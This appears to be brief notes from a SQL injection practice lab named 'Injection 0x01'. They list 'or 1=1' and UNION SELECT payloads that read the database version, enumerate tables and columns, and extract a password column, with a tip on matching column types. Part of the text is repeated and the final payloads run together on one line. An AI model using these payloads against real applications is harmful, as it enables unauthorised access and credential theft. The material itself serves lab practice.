Injection 0x01
jeremy' or 1=1-- -
jeremy' union select null,null,version()#



If you encounter like a ID column which is a int
Try to change the null which is a string to int
So that the payload will work
Last updated
jeremy' or 1=1-- -
jeremy' union select null,null,version()#



If you encounter like a ID column which is a int
Try to change the null which is a string to int
So that the payload will work
Last updated
jeremy' union select null,null,table_name from information_schema.tables#jeremy' union select null,null,column_name from information_schema.columns#jeremy' union select null,null,password from injection0x01#jeremy' union select null(int),1,null,null,password from injection0x01#